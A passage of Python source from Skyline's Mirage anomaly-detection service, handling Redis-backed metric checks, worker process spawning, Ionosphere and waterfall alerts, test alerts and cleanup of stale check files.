logger.error('error :: failed to get Redis set mirage.populate_redis')
populate_redis_with_metrics = []
metric_to_populate_redis = None
populate_redis_with_metrics_count = 0
if populate_redis_with_metrics:
populate_redis_with_metrics_count = len(populate_redis_with_metrics)
logger.info('%s metrics found in mirage.populate_redis Redis set' % str(populate_redis_with_metrics_count))
try:
metric_to_populate_redis = str(populate_redis_with_metrics[0])
try:
del populate_redis_with_metrics
except:
pass
logger.info('processing %s from mirage.populate_redis Redis set' % metric_to_populate_redis)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine metric to populate_redis')
metric_to_populate_redis = None
if metric_to_populate_redis:
try:
# Spawn a populate_redis processes
pids = []
spawned_pids = []
p = Process(target=self.populate_redis, args=(1, metric_to_populate_redis))
pids.append(p)
logger.info('starting populate_redis process')
p.start()
spawned_pids.append(p.pid)
p_starts = time()
while time() - p_starts <= 10:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('populate_redis process completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing populate_redis process')
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('stopping populate_redis process - %s' % (str(p.is_alive())))
p.join()
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to spawn populate_redis process')
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# If Ionosphere is going to pass alerts back to the app
# here we are going to have break out and force a alerting
# only run.
ionosphere_alerts = None
ionosphere_alerts_returned = False
metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not postpone the Ionosphere alerts check based on whether
# there are checks or not
# if len(metric_var_files) == 0:
if not ionosphere_alerts_returned:
# @modified 20161228 - Feature #1830: Ionosphere alerts
try:
# @modified 20200430 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_alerts = list(self.redis_conn.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alerts = list(self.redis_conn_decoded.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alerts_returned = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to scan ionosphere.mirage.alert.* from Redis')
ionosphere_alerts = []
if len(ionosphere_alerts) == 0:
ionosphere_alerts_returned = False
else:
logger.info('Ionosphere alert requested :: %s' % str(ionosphere_alerts))
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not postpone the Ionosphere alerts check
# if not ionosphere_alerts_returned:
# logger.info('sleeping no metrics...')
# sleep(10)
# @added 20191106 - Branch #3262: py3
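# If an alert test file is present, read the [metric, alerter] list
# from it and fire a test alert via the requested smtp or slack
# alerter, then remove the test file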
if os.path.isfile(alert_test_file):
test_alert = None
try:
with open((alert_test_file), 'r') as fh:
raw_test_alert = fh.read()
test_alert = literal_eval(raw_test_alert)
# [metric, alerter]
# e.g. ['server-1.cpu.user', 'smtp']
# e.g. ['server-1.cpu.user', 'slack']
# e.g. ['skyline_test.alerters.test', 'smtp']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not evaluate test_alert from %s' % alert_test_file)
if test_alert:
try:
logger.info('test alert metric found - alerting on %s' % str((test_alert)))
metric_name = str(test_alert[0])
test_alerter = str(test_alert[1])
metric = (1, metric_name, int(time()))
alert = (metric_name, test_alerter, 10)
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
triggered_algorithms = ['testing']
if settings.SLACK_ENABLED and test_alerter == 'slack':
logger.info('test alert to slack for %s' % (metric_name))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, 604800, skyline_app, triggered_algorithms)
if test_alerter == 'smtp':
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
smtp_trigger_alert(alert, metric, 604800, skyline_app, triggered_algorithms)
except:
logger.error('error :: test trigger_alert - %s' % traceback.format_exc())
logger.error('error :: failed to test trigger_alert :: %s' % metric_name)
try:
os.remove(alert_test_file)
except OSError:
logger.error('error - failed to remove %s, continuing' % alert_test_file)
pass
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Moved the len(metric_var_files) check from above and apply the
# appropriate sleep
if len(metric_var_files) == 0:
if not ionosphere_alerts_returned:
# @modified 20200604 - Mirage - populate_redis
# Do not sleep if there are metrics to populate in Redis
if populate_redis_with_metrics_count == 0:
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
sleep_for = 10
next_send_to_graphite = last_sent_to_graphite + 60
seconds_to_next_send_to_graphite = next_send_to_graphite - int(time())
if seconds_to_next_send_to_graphite < 10:
if seconds_to_next_send_to_graphite > 1:
sleep_for = seconds_to_next_send_to_graphite
else:
break
logger.info('sleeping no metrics...')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# sleep(10)
sleep(sleep_for)
else:
logger.info('no checks or alerts, continuing to process populate_redis metrics')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Removed sleep, no delay
# else:
# sleep(1)
# Clean up old files
now_timestamp = time()
stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS
for current_file in listdir(settings.MIRAGE_CHECK_PATH):
if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file):
t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file)
c = t.st_ctime
# delete the check file if it is older than MIRAGE_STALE_SECONDS
if c < stale_age:
os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
logger.info('removed stale check - %s' % (current_file))
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.stale_check_discarded'
try:
self.redis_conn.sadd(redis_set, str(current_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(current_file), str(redis_set)))
# @added 20201026 - Task #3800: Handle feedback metrics in Mirage and waterfall alerts
# Handle feedback metrics in a similar style to Ionosphere
# Do not run checks if namespace has matched multiple times in
# the last 10 minutes.
if len(metric_var_files) > 3:
analyzer_waterfall_alerts = []
feedback_metric_loop_error_logged = False
for current_file in listdir(settings.MIRAGE_CHECK_PATH):
feedback_metric = False
remove_feedback_metric_check = False
remove_alerted_on_metric_check = False
try:
current_file_no_extension = current_file.replace('.txt', '')
current_file_no_extension_elements = current_file_no_extension.split('.')
base_name = '.'.join(current_file_no_extension_elements[1:])
metric_timestamp = int(current_file_no_extension_elements[0])
except:
pass
try:
metric_namespace_elements = base_name.split('.')
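# A metric is treated as a feedback metric if a SKYLINE_FEEDBACK_NAMESPACES
# entry is a substring of the metric name, or if all the dotted elements
# of that entry are present in the metric namespace elements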
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
feedback_cache_key_exists = False
feedback_cache_key = 'mirage.feedback_metric.checked.%s' % (base_name)
feedback_metric_process_time = int(time())
if feedback_metric:
try:
feedback_cache_key_exists = self.redis_conn_decoded.get(feedback_cache_key)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to get %s key from Redis' % (
str(feedback_cache_key)))
if feedback_cache_key_exists:
feedback_metric_last_processed_seconds_ago = feedback_metric_process_time - int(feedback_cache_key_exists)
logger.info('feedback metric identified as last processed %s seconds ago via Redis key %s' % (
str(feedback_metric_last_processed_seconds_ago), feedback_cache_key))
remove_feedback_metric_check = True
# @added 20210505 - Bug #4048: Mirage - removing feedback metrics to be processed
feedback_processed_cache_key = 'mirage.feedback_metric.processed.%s' % (base_name)
feedback_processed_cache_key_exists = None
try:
feedback_processed_cache_key_exists = self.redis_conn_decoded.get(feedback_processed_cache_key)
except Exception as e:
logger.error('error :: failed to get %s key from Redis - %s' % (
str(feedback_processed_cache_key), e))
if not feedback_processed_cache_key_exists:
remove_feedback_metric_check = False
logger.info('feedback metric Redis key %s does not exist, not removing metric' % feedback_processed_cache_key)
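# When there is a backlog of more than 10 checks Mirage is considered
# busy and the feedback metric check is discarded even if it has not
# been processed recently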
if len(metric_var_files) > 10 and not feedback_cache_key_exists:
logger.info('Mirage is busy removing feedback metric check')
remove_feedback_metric_check = True
# @modified 20201128 - Feature #3734: waterfall alerts
# Only add if does not exist and always add
# else:
# try:
# self.redis_conn.setex(feedback_cache_key, 600, feedback_metric_process_time)
# if not feedback_cache_key_exists:
if not feedback_cache_key_exists and not remove_feedback_metric_check:
logger.info('feedback metric identified as not processed in last 600 seconds adding Redis key with 600 TTL and processing - %s' % feedback_cache_key)
try:
self.redis_conn.setex(feedback_cache_key, 600, feedback_metric_process_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(feedback_cache_key)))
except:
if not feedback_metric_loop_error_logged:
logger.error(traceback.format_exc())
logger.error('error :: failed to check feedback and alerted on metrics')
feedback_metric_loop_error_logged = True
# Remove checks that have been alerted on by Mirage or
# via an Analyzer waterfall alert
if len(metric_var_files) > 10 and not remove_feedback_metric_check:
cache_key = 'mirage.last_alert.smtp.%s' % (base_name)
alerted_on = False
try:
alerted_on = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
if not alerted_on:
# Check for Analyzer alert key from waterfall alert
cache_key = 'last_alert.smtp.%s' % (base_name)
try:
alerted_on = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
if alerted_on:
remove_alerted_on_metric_check = True
# Unless it is older than PANORAMA_EXPIRY_TIME
try:
alerted_on_at = int(alerted_on)
alerted_on_seconds_ago = int(time()) - alerted_on_at
if alerted_on_seconds_ago >= settings.PANORAMA_EXPIRY_TIME:
remove_alerted_on_metric_check = False
except:
remove_alerted_on_metric_check = True
pass
if remove_feedback_metric_check or remove_alerted_on_metric_check:
if remove_feedback_metric_check:
log_str = 'feedback metric'
if remove_alerted_on_metric_check:
log_str = 'alerted on metric'
logger.info('removing %s %s check file and from analyzer.waterfall_alerts.sent_to_mirage Redis set' % (
log_str, base_name))
try:
os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
except:
logger.error('error :: failed to remove %s %s check file - %s' % (
log_str, base_name, current_file))
# Remove the metric from the waterfall_alerts Redis set
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
if not analyzer_waterfall_alerts:
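# Only fetch the analyzer waterfall alerts Redis set once and reuse
# the resulting list for any further check files removed in this loop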
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
literal_analyzer_waterfall_alerts = []
try:
literal_analyzer_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_analyzer_waterfall_alerts = []
analyzer_waterfall_alerts = []
for literal_waterfall_alert in literal_analyzer_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
analyzer_waterfall_alerts.append(waterfall_alert)
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item for %s from Redis set %s - %s' % (
log_str, redis_set, str(waterfall_alert)))
# @modified 20201128 - Feature #3734: waterfall alerts
# Do not break, check and remove
# waterfall_alert items with older
# timestamps as well
# break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s %s at %s from Redis set %s' % (
log_str, base_name, str(metric_timestamp), redis_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing analyzer
# waterfall alert metric timestamp, remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp for %s from Redis set %s - %s' % (
log_str, redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s %s at %s from Redis set %s' % (
log_str, base_name, str(metric_timestamp), redis_set))
# Discover metric to analyze
metric_var_files = ''
# @added 20161228 - Feature #1830: Ionosphere alerts
# Prioritises Ionosphere alerts
if ionosphere_alerts_returned:
break
metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
if len(metric_var_files) > 0:
break
process_metric_check_files = False
# @modified 20161228 - Feature #1830: Ionosphere alerts
# Only spawn process if this is not an Ionosphere alert
if not ionosphere_alerts_returned:
metric_var_files_sorted = sorted(metric_var_files)
# metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0]
if metric_var_files_sorted:
process_metric_check_files = True
if process_metric_check_files:
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
check_files_to_process = len(metric_var_files_sorted)
logger.info('%s checks to process' % str(check_files_to_process))
# Remove any existing algorithm.error files from any previous runs
# that did not cleanup for any reason
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc()))
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# MIRAGE_PROCESSES = 1
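# Cap MIRAGE_PROCESSES at the number of check files so that no
# spin_process is started without a check file to process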
if len(metric_var_files) > 1:
try:
MIRAGE_PROCESSES = int(settings.MIRAGE_PROCESSES)
if len(metric_var_files) < MIRAGE_PROCESSES:
MIRAGE_PROCESSES = len(metric_var_files)
except:
MIRAGE_PROCESSES = 1
else:
MIRAGE_PROCESSES = 1
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# processing_check_file = metric_var_files_sorted[0]
# logger.info('processing %s' % processing_check_file)
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# for i in range(1, MIRAGE_PROCESSES + 1):
# up_to = i - 1
# processing_check_file = metric_var_files_sorted[up_to]
# logger.info('processing %s' % processing_check_file)
# @modified 20161224 - send mirage metrics to graphite
# run_timestamp = int(now)
run_timestamp = int(time())
for i in range(1, MIRAGE_PROCESSES + 1):
# @added 20200909 - Task #3730: Validate Mirage running multiple processes
up_to = i - 1
processing_check_file = metric_var_files_sorted[up_to]
logger.info('processing %s' % processing_check_file)
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# p = Process(target=self.spin_process, args=(i, run_timestamp, metric_var_files_sorted))
p = Process(target=self.spin_process, args=(i, run_timestamp, processing_check_file))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES)))
p.start()
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# spawned_pids.append(p.pid)
spawned_pids.append([p.pid, i])
logger.info('started spin_process %s with pid %s' % (str(pid_count), str(p.pid)))
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_process has run
# for longer than 180 seconds - 20160512 @earthgecko
p_starts = time()
while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (
skyline_app, str(MIRAGE_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
# @added 20200607 - Feature #3508: ionosphere.untrainable_metrics
# Check for non-3sigma algorithm errors too
if LOCAL_DEBUG:
logger.debug('debug :: adding negatives_present to check_algorithm_errors')
check_algorithm_errors = ['negatives_present']
for algorithm in list(settings.MIRAGE_ALGORITHMS):
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: adding %s to check_algorithm_errors' % (algorithm))
check_algorithm_errors.append(algorithm)
# @added 20200607 - Feature #3566: custom_algorithms
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: adding custom_algorithm %s to check_algorithm_errors' % (custom_algorithm))
check_algorithm_errors.append(custom_algorithm)
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: checking for algorithm error files')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# for completed_pid in spawned_pids:
for completed_pid, mirage_process in spawned_pids:
logger.info('spin_process with pid %s completed' % (str(completed_pid)))
# @modified 20200607 - Feature #3566: custom_algorithms
# Feature #3508: ionosphere.untrainable_metrics
# Check for non-3sigma algorithm errors too and wrapped in try
try:
# for algorithm in settings.MIRAGE_ALGORITHMS:
for algorithm in check_algorithm_errors:
algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
settings.SKYLINE_TMP_DIR, skyline_app,
str(completed_pid), algorithm)
if os.path.isfile(algorithm_error_file):
logger.error(
'error :: spin_process with pid %s has reported an error with the %s algorithm' % (
str(completed_pid), algorithm))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read %s error file' % algorithm)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: checked for algorithm error files')
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.mirage_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
# @added 20191113 - Branch #3262: py3
# Log
logger.info('anomaly_breakdown.keys are empty')
break
while 1:
try:
key, value = self.mirage_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
# @added 20191113 - Branch #3262: py3
# Log
logger.info('exceptions.keys are empty')
break
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.MIRAGE_ALGORITHMS:
for i_anomaly_breakdown in check_algorithm_errors:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set and not self.metric_variables
metric_variables = []
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# literal_metric_variables = list(self.redis_conn.smembers('mirage.metric_variables'))
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle per process
# literal_metric_variables = list(self.redis_conn_decoded.smembers('mirage.metric_variables'))
metric_variable_redis_set = 'mirage.%s.metric_variables' % str(mirage_process)
literal_metric_variables = list(self.redis_conn_decoded.smembers(metric_variable_redis_set))
for item_list_string in literal_metric_variables:
list_item = literal_eval(item_list_string)
metric_variables.append(list_item)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle per process
try:
self.redis_conn.delete(metric_variable_redis_set)
logger.info('deleted Redis set - %s' % metric_variable_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % metric_variable_redis_set)
# @added 20191113 - Branch #3262: py3
# Set default values
metric_name = None
metric_value = None
hours_to_resolve = 0
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for metric_variable in self.metric_variables:
for metric_variable in metric_variables:
if metric_variable[0] == 'metric_name':
metric_name = metric_variable[1]
if metric_variable[0] == 'metric_value':
metric_value = metric_variable[1]
if metric_variable[0] == 'hours_to_resolve':
hours_to_resolve = metric_variable[1]
# if metric_variable[0] == 'metric_timestamp':
# metric_timestamp = metric_variable[1]
logger.info('analysis done - %s' % str(metric_name))
# Send alerts
# Calculate hours second order resolution to seconds
# @modified 20191113 - Branch #3262: py3
# Only if set
if hours_to_resolve:
logger.info('analyzed at %s hours resolution' % hours_to_resolve)
second_order_resolution_seconds = int(hours_to_resolve) * 3600
logger.info('analyzed at %s seconds resolution' % str(second_order_resolution_seconds))
# Remove metric check file
metric_check_file = 'None'
try:
metric_check_file = '%s/%s' % (settings.MIRAGE_CHECK_PATH, processing_check_file)
if LOCAL_DEBUG:
logger.debug('debug :: interpolated metric_check_file to %s' % metric_check_file)
except:
logger.error('error :: failed to interpolate metric_check_file')
if os.path.isfile(metric_check_file):
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
if LOCAL_DEBUG:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove metric_check_file - %s' % metric_check_file)
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove metric_check_file - %s' % metric_check_file)
else:
if LOCAL_DEBUG:
logger.debug('debug :: no metric_check_file to remove OK - %s' % metric_check_file)
# Remove the metric directory
# @modified 20191113 - Branch #3262: py3
# Convert None to str
# timeseries_dir = metric_name.replace('.', '/')
metric_data_dir = 'None'
try:
metric_name_str = str(metric_name)
timeseries_dir = metric_name_str.replace('.', '/')
metric_data_dir = '%s/%s' % (settings.MIRAGE_CHECK_PATH, timeseries_dir)
if LOCAL_DEBUG:
logger.debug('debug :: metric_data_dir interpolated to %s' % str(metric_data_dir))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to interpolate metric_data_dir')
metric_data_dir = 'None'
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
else:
if LOCAL_DEBUG:
logger.debug('debug :: metric_data_dir does not exist - %s' % str(metric_data_dir))
ionosphere_unique_metrics = []
if settings.MIRAGE_ENABLE_ALERTS:
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
else:
if LOCAL_DEBUG:
logger.debug('debug :: settings.MIRAGE_ENABLE_ALERTS is not True')
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Send alerts for Ionosphere
alert_context = 'Mirage'
if ionosphere_alerts_returned:
alert_context = 'Ionosphere'
ionosphere_unique_metrics = []
logger.info('Ionosphere alerts requested, emptying ionosphere_unique_metrics so Mirage will alert')
exceptions = dict()
# @modified 20190524 - Branch #3002
# Wrapped in try except
try:
run_timestamp = int(time())
# @modified 20200430 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_alert_on = list(self.redis_conn.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alert_on = list(self.redis_conn_decoded.scan_iter(match='ionosphere.mirage.alert.*'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.mirage.alert.* from Redis key scan')
ionosphere_alert_on = []
for cache_key in ionosphere_alert_on:
try:
# @modified 20200322 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# alert_on = self.redis_conn.get(cache_key)
alert_on = self.redis_conn_decoded.get(cache_key)
send_alert_for = literal_eval(alert_on)
value = float(send_alert_for[0])
base_name = str(send_alert_for[1])
metric_timestamp = int(float(send_alert_for[2]))
triggered_algorithms = send_alert_for[3]
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
algorithms_run = send_alert_for[5]
second_order_resolution_seconds = int(send_alert_for[4])
# @modified 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
# anomalous_metric = [value, base_name, metric_timestamp, second_order_resolution_seconds]
anomalous_metric = [value, base_name, metric_timestamp, second_order_resolution_seconds, triggered_algorithms, algorithms_run]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(anomalous_metric)
redis_set = 'mirage.anomalous_metrics'
data = str(anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210323 - Feature #3642: Anomaly type classification
if LUMINOSITY_CLASSIFY_ANOMALIES:
redis_set = 'luminosity.classify_anomalies'
added_at = int(time())
data_dict = {
'metric': base_name,
'timestamp': int(metric_timestamp),
'value': value,
'algorithms': algorithms_run,
'triggered_algorithms': triggered_algorithms,
'app': skyline_app,
'added_at': added_at,
}
data = [base_name, int(metric_timestamp), added_at, data_dict]
try:
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
anomaly_breakdown = dict()
for algorithm in triggered_algorithms:
anomaly_breakdown[algorithm] = 1
self.redis_conn.delete(cache_key)
except:
logger.error(traceback.format_exc())
# @modified 20200322 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# logger.error('error :: failed to add an Ionosphere anomalous_metric for %s' % base_name)
logger.error('error :: failed to add an Ionosphere anomalous_metric for cache key %s' % cache_key)
else:
if LOCAL_DEBUG:
logger.debug('debug :: no ionosphere_alerts_returned - %s' % str(ionosphere_alerts_returned))
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
# To reduce the amount of I/O used by Mirage in this loop check
# and reduce the number of log entries for 'not alerting - Ionosphere metric'
# a check is made if the metric_name has already been checked, if
# so continue
not_alerting_for_ionosphere = 'none'
# @added 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Only check Ionosphere is up once per cycle
ionosphere_up = False
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
mirage_anomalous_metrics = []
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# literal_mirage_anomalous_metrics = list(self.redis_conn.smembers('mirage.anomalous_metrics'))
literal_mirage_anomalous_metrics = list(self.redis_conn_decoded.smembers('mirage.anomalous_metrics'))
for metric_list_string in literal_mirage_anomalous_metrics:
metric = literal_eval(metric_list_string)
mirage_anomalous_metrics.append(metric)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from mirage.anomalous_metrics Redis set')
mirage_anomalous_metrics = []
# @added 20200907 - Feature #3734: waterfall alerts
# Add alert for expired waterfall_alert items
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
waterfall_alert_check_timestamp = int(time())
waterfall_alerts_to_alert_on = []
# A list to add a metric,timestamp string to in order to override
# the ionosphere_metric in the alerting block
alerting_waterfall_alerts = []
waterfall_redis_sets = [
'mirage.waterfall_alerts.sent_to_ionosphere',
]
for waterfall_redis_set in waterfall_redis_sets:
redis_set = waterfall_redis_set
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
logger.info('checking for expired checks in %s waterfall alerts in Redis set %s' % (
str(len(literal_waterfall_alerts)), redis_set))
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
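# A waterfall alert item is considered expired if it was added to the
# set more than 300 seconds ago, in which case Mirage alerts on it
# rather than waiting any longer for Ionosphere to handle it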
if waterfall_alert_check_timestamp >= (int(waterfall_alert[3]) + 300):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item to alert on from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
waterfall_alerts_to_alert_on.append(waterfall_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
for waterfall_alert in waterfall_alerts_to_alert_on:
try:
value = float(waterfall_alert[2])
base_name = str(waterfall_alert[0])
metric_timestamp = int(waterfall_alert[1])
# @added 20201008 - Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
algorithms_run = waterfall_alert[4][4]
triggered_algorithms = waterfall_alert[4][5]
# @modified 20201008 - Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
# anomalous_metric = [value, base_name, metric_timestamp]
# mirage_anomalous_metrics.append([value, base_name, metric_timestamp])
